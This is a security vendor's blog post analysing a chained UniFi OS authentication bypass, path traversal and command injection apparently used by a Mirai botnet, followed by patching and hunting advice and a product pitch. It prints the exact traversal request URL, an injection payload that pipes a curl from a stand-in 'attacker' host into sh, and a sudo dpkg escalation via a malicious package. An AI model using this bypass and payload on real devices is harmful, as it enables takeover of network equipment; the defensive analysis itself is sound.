CISA KEV Active Exploitation Pre-Auth RCE

Three CVSS 10.0 bugs in UniFi OS are already feeding a botnet

June 29, 2026·9 min read·Chris Boker, Founder, CVEasy AI
A UniFi OS auth gate is bypassed by a request whose raw URL begins with the public validate-sso prefix while its normalized form loops past the gate into the internal latest_package endpoint, with a Mirai swarm recruiting downstream routers

A small office park behind my house runs Ubiquiti gear at every floor. Cloud Gateway out front, a Protect NVR in the parking lot closet for the cameras, a Talk box on the receptionist's desk, an Access Hub on the side door. On Tuesday June 23, 2026, CISA dropped three CVSS 10.0 UniFi OS flaws into the Known Exploited Vulnerabilities catalog and gave federal agencies until June 26 to patch. By the time that deadline arrived, a Mirai/Gaafgyt botnet had already been recruiting exposed UniFi devices for two weeks from a single source IP. The chain is not theoretical. One unauthenticated HTTP request walks from outside the box to a root shell.

Three CVE numbers carry it: CVE-2026-34908 (improper access control), CVE-2026-34909 (path traversal), and CVE-2026-34910 (OS command injection), each rated 10.0 in Ubiquiti Security Advisory Bulletin 064. The vendor fix shipped on May 21, 2026 as UniFi OS Server 5.0.8, with matching firmware for the UNVR-G2 line at 5.1.12 and the UNAS series at 5.1.10. BishopFox published the end-to-end chain analysis. PwnDefend caught the in-the-wild traffic on June 9, two weeks before the KEV listing.

The auth gate looks at one URL, the router uses another

The UniFi OS stack puts an nginx front door in front of every internal API. That front door keeps a public-exemption list, and anything starting with /api/auth/validate-sso/, the Single Sign On callback path, is allowed through unauthenticated by design, because the SSO handshake has to land somewhere before a user has a session.

The bug is how the front door checks that prefix. Its exemption logic reads the raw, percent-encoded URI from the x-original-uri header. Inside the box, though, the upstream router that actually serves the request reads the normalized URI: percent-decoded, with .. segments collapsed. Those two views are supposed to be the same string, and on UniFi OS Server 5.0.6 and earlier they are not.

An attacker crafts a request whose raw URI starts with the SSO prefix, then continues with encoded traversal: /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package. The exemption check looks at the raw string, sees /api/auth/validate-sso/, lets it through. nginx then decodes the %2f bytes, collapses the .. hops, and routes the call to the authenticated internal endpoint /proxy/users/api/v2/ucs/update/latest_package. The gate said yes to the SSO callback. The handler that actually receives the request was minding the package update queue. BishopFox's published detector exercises exactly that primitive in a read-only probe.

CVE-2026-34908 and CVE-2026-34909 are two faces of that single divergence. The access control flaw is that the raw view passes; the path traversal is the encoded ..%2f hops that move the normalized view across to a different internal route. The chain ships with both numbers because both are real and both are required.

Inside latest_package, the package name becomes a shell string

The endpoint behind that gate handles UniFi's package update flow. It takes a package name from the request body and resolves it against the upstream registry. The handler, written in Go, builds the shell command with a literal fmt.Sprintf along the lines of sudo /usr/bin/uos runnable latest-versions %v, where %v is the caller-supplied package name interpolated verbatim. The resulting string is handed to a helper that runs it through sh -c.

No validation, no allowlist, no quoting of the package name. If the input is pkg, the helper runs the expected version lookup. If the input is ;curl%20http://attacker/x|sh;, the shell happily parses the semicolons and the pipe and runs whatever the attacker put in. That is the textbook command injection sink, and it sits at the end of an unauthenticated path that should not have existed.

That is CVE-2026-34910 on its own. Without the validate-sso divergence above it, the endpoint still needs an authenticated session and the sink stays local. Chained with the bypass, the sink is on the open internet.

Passwordless sudo on dpkg is the climb to root

The shell that opens still belongs to the unifi-os service account, not root. The escalation is sitting in /etc/sudoers.d. That account holds passwordless sudo entitlements on four binaries: /usr/bin/dpkg, /bin/chmod, /bin/systemctl, and /usr/bin/uos. Any one of them is enough.

The straightforward path is dpkg. An attacker drops a small .deb whose postinst maintainer script reads /etc/shadow, runs id, and opens a reverse shell. Running sudo /usr/bin/dpkg -i /tmp/pkg.deb installs the package, and postinst executes as root because that is what dpkg does. BishopFox demonstrated exactly that on a live target and printed the contents of /etc/shadow as proof. The other three sudo entitlements offer the same outcome through different doors.

176.65.148.183 was already burning through routers

The exploit was not waiting in a researcher's lab. PwnDefend captured the in-the-wild traffic on June 9, 2026, with a single source IP, 176.65.148.183, hammering the validate-sso bypass URL with payloads that ended in a wget of a Mirai loader named zok. The loader fingerprints the host architecture, pulls the matching Mirai or Gaafgyt build, and enrolls the device. Cybernews and BleepingComputer both corroborated the activity once CISA's June 23 KEV addition turned the lights on.

UniFi gear is a tidy chassis for Mirai. The devices are everywhere and they run a familiar Linux on common ARM and MIPS targets, with networking fast enough to source meaningful packets per second once recruited. They also sit on management interfaces that are often left reachable from the public internet, because making the SSO callback and the controller UI work from anywhere is a default convenience the average installer never turns off.

The whole chain in one breath: one unauthenticated HTTP request to a reachable UniFi OS Server, auth bypass via a raw vs normalized URI divergence, command injection via an unquoted package name fed to sh -c, root via passwordless sudo on dpkg. Three CVEs, three primitives, one chain. The botnet had it before CISA did.

A 10.0 on the box is not a 10.0 on your network

The CVSS base score on each of these three is 10.0. A CVSS-first queue puts every UniFi device you own at the top of tomorrow morning, regardless of where the device sits in your topology. That is the wrong call.

A Cloud Gateway facing the public internet with the controller UI reachable is the worst-case row, and it is one request from root. A Protect NVR on a flat office VLAN with the same UI reachable from corporate wireless is still serious, because anyone on that wireless network becomes an unauthenticated root candidate. Behind a hard segmentation rule, with the controller UI blocked from anything but a jump host, a Dream Machine controller drops several rows, because the attacker now has to first reach the jump host. The bug is the same. The risk is not.

CVSS scores the bug in the abstract. The base vector is identical across all three of those rows. Anything that mass-ranks by base score alone hands you the same priority for the gateway on a public IP and the controller in a locked closet, which is the same as saying it does not really know.

What TRIS does with this one

CVEasy AI's TRIS, the Threat and Risk Intelligence Scoring engine, takes the same three CVEs and walks four layers before it sets a priority.

Active exploitation. The first layer asks whether the chain is real today. CISA added all three to KEV on June 23, with a federal patch deadline three days later. PwnDefend has packet captures of the Mirai loader landing on production gear since June 9. TRIS sets the exploitation tier to ACT, the top band.

Blast radius. The second layer measures how wide the affected fleet runs. UniFi OS Server, UNVR-G2, UNVR-G2 Pro, every UNAS model from UNAS-2 through UNAS-Pro-8, every Dream Machine controller, every Cloud Gateway, every Access Hub, every Talk appliance. Most UniFi shops have a half-dozen of these on site, and many MSPs have hundreds across customers. The blast layer climbs further.

Mechanism severity. Unauthenticated, network-reachable, full-root code execution from a single HTTP request. There is no worse primitive on the rubric, and the layer maxes out.

Real exposure. This is the layer the others never reach, and it is the layer that decides your week. TRIS reads the inventory on your own hardware: which UniFi devices you have, which firmware they run, whether the controller UI answers on the public internet, whether it answers on a flat corporate VLAN, whether it sits behind a jump host. The same three CVE IDs come out as ACT on an exposed Cloud Gateway and a far lower tier on a segmented Dream Machine. A proven proof of concept plus active botnet traffic against your specific exposed asset is confirmed in-the-wild abuse; the same proof of concept against an asset the botnet cannot reach is a proven primitive but not an active compromise. TRIS keeps those honest.

Patch first, then go hunting

1. Update the firmware. Per Bulletin 064, push UniFi OS Server to 5.0.8 or later, UNVR-G2 and UNVR-G2 Pro to 5.1.12, and UNAS-2 through UNAS-Pro-8 to 5.1.10. The corresponding Cloud Gateway, Dream Machine, and Access Hub builds shipped on May 21 and are listed per device in the bulletin. Start with anything on a public IP.

2. Pull management interfaces off the public internet. The SSO callback does not need to be reachable from arbitrary residential ASNs. Restrict the controller UI and the validate-sso path to your office ranges, a VPN, or a Cloudflare Access policy. If you cannot patch tonight, that step alone removes the botnet's reach to your devices.

3. Hunt for the bypass signature. In your reverse proxy, WAF, and nginx access logs, search for the substring validate-sso/..%2f. There is no legitimate request that contains that sequence. Any hit is either a scan or an attempted exploitation. Pull the source IP and check whether the host responded with a 200 to the latest_package call.

4. Hunt for the botnet payload. Block and search for inbound traffic from 176.65.148.183 to every UniFi management port, and for outbound HTTP from any UniFi device to unfamiliar addresses on common Mirai dropper ports. Look for new processes named zok or anything pulling from wget calls into /tmp on the device.

5. Treat any reachable unpatched device as suspect. Anything on stale firmware that touched the public internet in the past two weeks is a candidate compromise. Reflash from a known-good image rather than upgrading in place. Rotate every credential the controller stored: Wi-Fi PSKs, Active Directory binds for portals, SMTP relays, RADIUS shared secrets, any API tokens issued to the controller. NVD's entry for CVE-2026-34910 is your reference for the underlying primitive.

Patch is the floor, not the ceiling. A reachable UniFi device that ran stale firmware between May 21 and the day you patched is a candidate compromise. Reflash and rotate. A botnet that was already inside before you arrived will be happy to leave itself behind as a cron job and a fresh SSH key.

How CVEasy AI surfaces this

CVEasy AI, the number one local-first CTEM platform, ingests the sources that decide a finding like this: the Ubiquiti PSIRT bulletin, the CISA KEV addition, the BishopFox technical chain, the PwnDefend in-the-wild capture. It runs the three CVE IDs through TRIS against the inventory on your own hardware. A Cloud Gateway on a public IP scores ACT and lands in the top row of your triage queue with a remediation workflow that opens at the 5.0.8 firmware path and ends at the reflash and rotate step. A Dream Machine behind a jump host scores lower and waits its turn. Your device inventory, your firmware versions, and your exposure topology never leave your network.

A 10.0 on a vendor advisory is a useful starting input. It is not a finished priority. TRIS does the work that turns three CVE rows and one botnet IP into one phone call.

Sources: BleepingComputer, CISA KEV addition (June 23, 2026), Ubiquiti Security Advisory Bulletin 064, BishopFox chain analysis, BishopFox detection script, PwnDefend in-the-wild capture, Cybernews, NVD: CVE-2026-34910